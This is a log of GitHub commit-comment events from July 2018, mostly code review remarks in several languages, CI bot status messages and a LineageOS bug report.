{"id":"7918135886","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594530,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-04T12:18:48Z","updated_at":"2018-07-04T12:18:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:18:48Z"}
{"id":"7918138832","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594541,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-04T12:19:25Z","updated_at":"2018-07-04T12:19:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:19:25Z"}
{"id":"7918140788","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29594546,"position":15,"line":654,"path":"src/LLVM_Runtime_Linker.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-04T12:19:50Z","updated_at":"2018-07-04T12:19:50Z","author_association":"COLLABORATOR","body":"The current examples target is host-hexagon_dma. When we give host as architecture (Locked Cache  or not) the code does not flow into CodeGen_Hexagon.cpp but into CodeGen_Posix.cpp( as given in current examples). I think the default will work for targets where hexagon is architecture but os is not qurt. We need to look where this scenario might  be applicable"}},"created_at":"2018-07-04T12:19:50Z"}
{"id":"7918142064","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29594548,"position":1,"line":1,"path":"src/runtime/default_cache_allocator.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-04T12:20:06Z","updated_at":"2018-07-04T12:20:06Z","author_association":"COLLABORATOR","body":"Same as above"}},"created_at":"2018-07-04T12:20:06Z"}
{"id":"7918143586","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594555,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-04T12:20:21Z","updated_at":"2018-07-04T12:20:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:20:21Z"}
{"id":"7918144395","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29594558,"position":72,"line":60,"path":"src/runtime/hexagon_cache_allocator.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-04T12:20:32Z","updated_at":"2018-07-04T12:20:32Z","author_association":"COLLABORATOR","body":"Will make the change "}},"created_at":"2018-07-04T12:20:32Z"}
{"id":"7918145106","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594561,"position":71,"line":71,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:20:41Z","updated_at":"2018-07-04T12:20:41Z","author_association":"NONE","body":"extraia tanto o painelPause e estaParado para um único método que recebe um boolean como argumento, pode chamá-lo de pausaTela, então reutilize nessa parte como também na parte quando identifica que está parado."}},"created_at":"2018-07-04T12:20:41Z"}
{"id":"7918146565","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594565,"position":79,"line":79,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:20:59Z","updated_at":"2018-07-04T12:20:59Z","author_association":"NONE","body":"Aqui que vai reutilizar o método que foi extraído para pausar o jogo recebendo o boolean"}},"created_at":"2018-07-04T12:20:59Z"}
{"id":"7918147034","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/muscat"},"payload":{"comment":{"id":29594566,"position":4,"line":71,"path":"app/models/ability.rb","commit_id":"cdc1e96c2aa432e101c6b26c6987fcebb31f9f2e","created_at":"2018-07-04T12:21:05Z","updated_at":"2018-07-04T12:21:05Z","author_association":"CONTRIBUTOR","body":"ok"}},"created_at":"2018-07-04T12:21:05Z"}
{"id":"7918148451","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29594567,"position":6,"line":149,"path":"src/runtime/runtime_internal.h","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-04T12:21:22Z","updated_at":"2018-07-04T12:21:22Z","author_association":"COLLABORATOR","body":"Once DMA Pool code is integrated into hex-dma2. Will move all APIs to common header for the Cache and DMA Pool APIs"}},"created_at":"2018-07-04T12:21:22Z"}
{"id":"7918150203","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29594570,"position":null,"line":null,"path":null,"commit_id":"1c31efe392e33c6eaba83712985f915fc79faeea","created_at":"2018-07-04T12:21:41Z","updated_at":"2018-07-04T12:21:41Z","author_association":"MEMBER","body":"被 git commit log 坑了一把，有个 commit 的 testcase 其实是一直跑不过的。但是合完后看时间线以为是之前就合进来的，只有 compare diff 才能看中间的所有变更。我感觉我头上的头发更少了...\r\n\r\n<img width=\"580\" alt=\"2018-07-04 8 06 02\" src=\"https://user-images.githubusercontent.com/5378891/42276613-03a2d918-7fc7-11e8-96c7-a39958a11f76.png\">\r\n看上面明晃晃的绿勾，吐血...\r\n"}},"created_at":"2018-07-04T12:21:41Z"}
{"id":"7918150291","type":"CommitCommentEvent","actor":{"login":"bumerslient"},"repo":{"name":"bumerslient/Java"},"payload":{"comment":{"id":29594571,"position":null,"line":null,"path":null,"commit_id":"64153faae0ec85bc630ed8e8dea5bdcb4ccccff3","created_at":"2018-07-04T12:21:43Z","updated_at":"2018-07-04T12:21:43Z","author_association":"OWNER","body":"null"}},"created_at":"2018-07-04T12:21:43Z"}
{"id":"7918152590","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594574,"position":78,"line":78,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:22:11Z","updated_at":"2018-07-04T12:22:11Z","author_association":"NONE","body":"Está usando o `this` para quase todas variáveis membro, mas nessa não usa, tem algum motivo? Se não, use também, é sempre bom manter o mesmo padrão para todos."}},"created_at":"2018-07-04T12:22:11Z"}
{"id":"7918153567","type":"CommitCommentEvent","actor":{"login":"maharshisolanki"},"repo":{"name":"maharshisolanki/maharshisolanki.github.io"},"payload":{"comment":{"id":29594577,"position":1,"line":1,"path":"CNAME","commit_id":"2d44768839feab9507d402a828672a5df10528a4","created_at":"2018-07-04T12:22:23Z","updated_at":"2018-07-04T12:22:23Z","author_association":"OWNER","body":"new"}},"created_at":"2018-07-04T12:22:23Z"}
{"id":"7918153651","type":"CommitCommentEvent","actor":{"login":"uknowmin"},"repo":{"name":"uknowmin/hello-world"},"payload":{"comment":{"id":29594578,"position":null,"line":null,"path":null,"commit_id":"7e4316a46c3371c055b0b4380e7d6f6891aef9c7","created_at":"2018-07-04T12:22:25Z","updated_at":"2018-07-04T12:22:25Z","author_association":"OWNER","body":"처음"}},"created_at":"2018-07-04T12:22:25Z"}
{"id":"7918154140","type":"CommitCommentEvent","actor":{"login":"ionutbalutoiu"},"repo":{"name":"Microsoft/mesos-jenkins"},"payload":{"comment":{"id":29594580,"position":66,"line":66,"path":"DCOS/Jenkinsfile","commit_id":"c9cbf01cd43fc73734f62a3a06c24c28a467d6eb","created_at":"2018-07-04T12:22:31Z","updated_at":"2018-07-04T12:22:31Z","author_association":"COLLABORATOR","body":"Rename this from `dcos_e2etest_env` to `dcos_e2e_testing_env`"}},"created_at":"2018-07-04T12:22:31Z"}
{"id":"7918154494","type":"CommitCommentEvent","actor":{"login":"alanz"},"repo":{"name":"haskell/haskell-ide-engine"},"payload":{"comment":{"id":29594581,"position":null,"line":null,"path":null,"commit_id":"a8fe53fde4a3949d61b97c78c79aef5249e063be","created_at":"2018-07-04T12:22:35Z","updated_at":"2018-07-04T12:22:35Z","author_association":"COLLABORATOR","body":"I deliberately made the circle functional tests run sequentially, as they operate over the same set of projects on the file system, and do things like \"cabal configure\" etc.\r\n\r\nSo be careful about this."}},"created_at":"2018-07-04T12:22:35Z"}
{"id":"7918155257","type":"CommitCommentEvent","actor":{"login":"dutch92"},"repo":{"name":"htmlacademy-javascript/563075-kekstagram"},"payload":{"comment":{"id":29594582,"position":4,"line":23,"path":"js/pictures.js","commit_id":"72ae7280a791d56ceb4146883d7b561807f4f144","created_at":"2018-07-04T12:22:45Z","updated_at":"2018-07-04T12:22:45Z","author_association":"COLLABORATOR","body":"23, 24 эти переменные не нужны"}},"created_at":"2018-07-04T12:22:45Z"}
{"id":"7918156152","type":"CommitCommentEvent","actor":{"login":"pxlpnk"},"repo":{"name":"fictional-tribble/test-js"},"payload":{"comment":{"id":29594584,"position":null,"line":null,"path":null,"commit_id":"af562eca90b7b6ddb49034fc8a720b7df442cdb9","created_at":"2018-07-04T12:22:57Z","updated_at":"2018-07-04T12:22:57Z","author_association":"CONTRIBUTOR","body":"test"}},"created_at":"2018-07-04T12:22:57Z"}
{"id":"7918158495","type":"CommitCommentEvent","actor":{"login":"wowwow21098"},"repo":{"name":"Sonelli/juicessh-performancemonitor"},"payload":{"comment":{"id":29594587,"position":4,"line":14,"path":"Plugin/src/main/AndroidManifest.xml","commit_id":"aaedf076e3f4157d55f663a3dde4b5fafb3c7c4e","created_at":"2018-07-04T12:23:24Z","updated_at":"2018-07-04T12:23:24Z","author_association":"NONE","body":"<su-0>"}},"created_at":"2018-07-04T12:23:24Z"}
{"id":"7918158800","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29594588,"position":null,"line":null,"path":null,"commit_id":"1c31efe392e33c6eaba83712985f915fc79faeea","created_at":"2018-07-04T12:23:28Z","updated_at":"2018-07-04T12:23:28Z","author_association":"MEMBER","body":" 另外，`jsx-a11y/aria-proptypes` 这个 rule 管的事情还蛮多的。等 release 前如果它们没搞好我们再 disabled 掉。"}},"created_at":"2018-07-04T12:23:28Z"}
{"id":"7918159017","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594589,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-04T12:23:30Z","updated_at":"2018-07-04T12:23:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:23:30Z"}
{"id":"7918159872","type":"CommitCommentEvent","actor":{"login":"ionutbalutoiu"},"repo":{"name":"Microsoft/mesos-jenkins"},"payload":{"comment":{"id":29594591,"position":69,"line":69,"path":"DCOS/Jenkinsfile","commit_id":"c9cbf01cd43fc73734f62a3a06c24c28a467d6eb","created_at":"2018-07-04T12:23:41Z","updated_at":"2018-07-04T12:23:41Z","author_association":"COLLABORATOR","body":"Please use consistent indentation here. Align `usernamePassword` definitions "}},"created_at":"2018-07-04T12:23:41Z"}
{"id":"7918161407","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594600,"position":85,"line":85,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:24:02Z","updated_at":"2018-07-04T12:24:02Z","author_association":"NONE","body":"Mantenha o pt-br, `INTERVALO_FIXO_DE_ATUALIZACAO` ou `INTERVALO_DE_ATUALIZACAO_FIXO`"}},"created_at":"2018-07-04T12:24:02Z"}
{"id":"7918161909","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29594601,"position":null,"line":null,"path":null,"commit_id":"a2625c36a08f15cb7ca82d53ece7401b6ff70eb1","created_at":"2018-07-04T12:24:09Z","updated_at":"2018-07-04T12:24:09Z","author_association":"COLLABORATOR","body":"Yeah right. I thought so as well. But what's gonna be the solution of this?"}},"created_at":"2018-07-04T12:24:09Z"}
{"id":"7918162066","type":"CommitCommentEvent","actor":{"login":"dutch92"},"repo":{"name":"htmlacademy-javascript/563075-kekstagram"},"payload":{"comment":{"id":29594603,"position":26,"line":51,"path":"js/pictures.js","commit_id":"72ae7280a791d56ceb4146883d7b561807f4f144","created_at":"2018-07-04T12:24:10Z","updated_at":"2018-07-04T12:24:10Z","author_association":"COLLABORATOR","body":"чтобы вернуть случайный элемент из массива, нам нужно получить случайное число от 0 до длины этого массива - 1. И поэтому в строчках 23, 24 нет необхоимости"}},"created_at":"2018-07-04T12:24:10Z"}
{"id":"7918162294","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"LineageOS/android_frameworks_base"},"payload":{"comment":{"id":29594604,"position":null,"line":null,"path":null,"commit_id":"2db5a337c191aa83c234829c46d2df7ec87fb981","created_at":"2018-07-04T12:24:12Z","updated_at":"2018-07-04T12:24:12Z","author_association":"NONE","body":"@javelinanddart\r\nI have tried this commit by upgrading a OnePlus 2 phone to the LineageOS 15.1 nightly of 2018-07-03.\r\nOn the OnePlus 2 this commit always hides signal icons for SIMs, even when they are actually enabled. As a secondary effect, the dialog to enter the pin for the second SIM is never presented, so effectively this is preventing the use of the second SIM.\r\nI guess that the reason for that is because the \"SIM cards\" dialog in OnePlus 2 doesn't work, it never worked on LineageOS 15, so the SIM appears to be disabled and the toggles don't work, even if they are actually active.\r\nWould it be possible to revert this commit until the SIM dialog is fixed?"}},"created_at":"2018-07-04T12:24:12Z"}
{"id":"7918186835","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594671,"position":18,"line":18,"path":"Assets/Scritpt/Gameplay/Gerador.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:29:11Z","updated_at":"2018-07-04T12:29:11Z","author_association":"NONE","body":"extrair constante"}},"created_at":"2018-07-04T12:29:11Z"}
{"id":"7918188093","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594673,"position":24,"line":24,"path":"Assets/Scritpt/Gameplay/Gerador.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:29:27Z","updated_at":"2018-07-04T12:29:27Z","author_association":"NONE","body":"extrair método"}},"created_at":"2018-07-04T12:29:27Z"}
{"id":"7918189448","type":"CommitCommentEvent","actor":{"login":"xrotwang"},"repo":{"name":"clld/soundcomparisons-data"},"payload":{"comment":{"id":29594678,"position":24,"line":135,"path":"pysoundcomparisons/__main__.py","commit_id":"4ca9424c5195543c1255efc751980d11425205b3","created_at":"2018-07-04T12:29:46Z","updated_at":"2018-07-04T12:29:46Z","author_association":"MEMBER","body":"You could also append an `ORDER BY FilePathPart` to the query and have the DB sort the rows; and then you could write to the file right away; i.e.\r\n```python\r\nwith ...open(...) as f:\r\n    for s in all_studies:\r\n        ...\r\n        f.write('{0}\\n'.format(row['FilePathPart']))\r\n```"}},"created_at":"2018-07-04T12:29:46Z"}
{"id":"7918189941","type":"CommitCommentEvent","actor":{"login":"jingxinxin"},"repo":{"name":"miraclepear/helpcircle"},"payload":{"comment":{"id":29594680,"position":null,"line":null,"path":null,"commit_id":"7dd0656c5900b0f8afda777bbbd7bccaafa3c27b","created_at":"2018-07-04T12:29:52Z","updated_at":"2018-07-04T12:29:52Z","author_association":"CONTRIBUTOR","body":"外面可以套一层表单组件做验证"}},"created_at":"2018-07-04T12:29:52Z"}
{"id":"7918190128","type":"CommitCommentEvent","actor":{"login":"sthaha"},"repo":{"name":"rohanKanojia/fabric8-jenkins-proxy"},"payload":{"comment":{"id":29594681,"position":20,"line":51,"path":"internal/jenkinsapi/jenkinsapi_test.go","commit_id":"ebefd9dfe20ed4028b6c99cb3607270971fa4fb1","created_at":"2018-07-04T12:29:54Z","updated_at":"2018-07-04T12:29:54Z","author_association":"NONE","body":"nice! \r\n@rohanKanojia could you please add a test case for idler.State() returning an error instead of the state? "}},"created_at":"2018-07-04T12:29:54Z"}
{"id":"7918191003","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594684,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-04T12:30:04Z","updated_at":"2018-07-04T12:30:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:30:04Z"}
{"id":"7918191123","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594685,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-04T12:30:06Z","updated_at":"2018-07-04T12:30:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:30:06Z"}
{"id":"7918197363","type":"CommitCommentEvent","actor":{"login":"GoneGame"},"repo":{"name":"TharinduNC/SAdashboard"},"payload":{"comment":{"id":29594695,"position":null,"line":null,"path":null,"commit_id":"6d15e304be5fbd0bdd40643093a4fb445d216607","created_at":"2018-07-04T12:31:21Z","updated_at":"2018-07-04T12:31:21Z","author_association":"COLLABORATOR","body":"fix checkbox checking one box, check's all boxes"}},"created_at":"2018-07-04T12:31:21Z"}
{"id":"7918197668","type":"CommitCommentEvent","actor":{"login":"xrotwang"},"repo":{"name":"clld/soundcomparisons-data"},"payload":{"comment":{"id":29594696,"position":14,"line":125,"path":"pysoundcomparisons/__main__.py","commit_id":"4ca9424c5195543c1255efc751980d11425205b3","created_at":"2018-07-04T12:31:25Z","updated_at":"2018-07-04T12:31:25Z","author_association":"MEMBER","body":"It's a bit un-intuitive that an invalid (i.e. not existing) study name is silently treated like no study name was specified."}},"created_at":"2018-07-04T12:31:25Z"}
{"id":"7918198857","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594698,"position":26,"line":26,"path":"Assets/Scritpt/Gameplay/Gerador.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:31:40Z","updated_at":"2018-07-04T12:31:40Z","author_association":"NONE","body":"é comum esse tpo de nome para esse retorno? Ele não tem mais significado dentro do jogo?\r\n"}},"created_at":"2018-07-04T12:31:40Z"}
{"id":"7918202118","type":"CommitCommentEvent","actor":{"login":"dcharbonnier"},"repo":{"name":"share/sharedb"},"payload":{"comment":{"id":29594700,"position":5,"line":617,"path":"lib/backend.js","commit_id":"f6c07a4f09a862bba09534189d36841df0e78fab","created_at":"2018-07-04T12:32:22Z","updated_at":"2018-07-04T12:32:22Z","author_association":"CONTRIBUTOR","body":"`typeof NaN === 'number'`  so maybe `typeof timestramp === 'number' && isFinit(timestamp)` is more appropriate"}},"created_at":"2018-07-04T12:32:22Z"}
{"id":"7918203118","type":"CommitCommentEvent","actor":{"login":"fanick1"},"repo":{"name":"w8tcha/CKEditor-CodeMirror-Plugin"},"payload":{"comment":{"id":29594703,"position":4,"line":50,"path":"Gruntfile.js","commit_id":"213e82994296cf1d1cf2b4c5ac6f2d7cd9c1b74e","created_at":"2018-07-04T12:32:35Z","updated_at":"2018-07-04T12:32:35Z","author_association":"CONTRIBUTOR","body":"Hi, \r\nI think this new mode must also be reflected in codemirror/plugin.js in the require.config({ packages: block similarly to other modes to make it work in require.js environment\r\nF."}},"created_at":"2018-07-04T12:32:35Z"}
{"id":"7918204125","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29594704,"position":null,"line":null,"path":null,"commit_id":"68b1052bced6fb9d4957849e24e03a8ba7f72215","created_at":"2018-07-04T12:32:48Z","updated_at":"2018-07-04T12:32:48Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-245](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-245).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-245-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-04T12:32:48Z"}
{"id":"7918206373","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29594713,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-04T12:33:17Z","updated_at":"2018-07-04T12:33:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T12:33:17Z"}
{"id":"7918207145","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594714,"position":35,"line":35,"path":"Assets/Scritpt/Gameplay/Gerador.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:33:26Z","updated_at":"2018-07-04T12:33:26Z","author_association":"NONE","body":"Da pra extrair esse blocão de código para algo como `definirPosicaoDoInimigo ou algo do gênero"}},"created_at":"2018-07-04T12:33:26Z"}
{"id":"7918208261","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"serenity-bdd/serenity-cucumber-starter"},"payload":{"comment":{"id":29594717,"position":30,"line":30,"path":"pom.xml","commit_id":"cf29c756f3bf73470805f77e1a56b83c3cebb505","created_at":"2018-07-04T12:33:40Z","updated_at":"2018-07-04T12:33:40Z","author_association":"CONTRIBUTOR","body":"JCenter is a clone of Maven Central, but it is where the Serenity builds are deployed fast, new versions get here sooner."}},"created_at":"2018-07-04T12:33:40Z"}
{"id":"7918209685","type":"CommitCommentEvent","actor":{"login":"mounten2657"},"repo":{"name":"mounten2657/awork"},"payload":{"comment":{"id":29594719,"position":null,"line":null,"path":null,"commit_id":"e0e1c8ff0f81e7e3616a39e9115dcfb68cce10b5","created_at":"2018-07-04T12:33:58Z","updated_at":"2018-07-04T12:33:58Z","author_association":"OWNER","body":"the origin version"}},"created_at":"2018-07-04T12:33:58Z"}
{"id":"7918211186","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29594721,"position":null,"line":null,"path":null,"commit_id":"0ce9c028a29d756cf1f1c80b29b5b2b7f76b7043","created_at":"2018-07-04T12:34:15Z","updated_at":"2018-07-04T12:34:15Z","author_association":"OWNER","body":"Vrode ispravil posmotrite plz"}},"created_at":"2018-07-04T12:34:15Z"}
{"id":"7918211443","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594722,"position":39,"line":39,"path":"Assets/Scritpt/Gameplay/Gerador.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:34:19Z","updated_at":"2018-07-04T12:34:19Z","author_association":"NONE","body":"método gerado pela unity? Se não, use o nome pt-br"}},"created_at":"2018-07-04T12:34:19Z"}
{"id":"7918212797","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"dotnet/BenchmarkDotNet"},"payload":{"comment":{"id":29594728,"position":null,"line":null,"path":null,"commit_id":"95750c2734b966fd6db2124440f4a9cca61a4127","created_at":"2018-07-04T12:34:36Z","updated_at":"2018-07-04T12:34:36Z","author_association":"MEMBER","body":"@adamsitnik, thanks!"}},"created_at":"2018-07-04T12:34:36Z"}
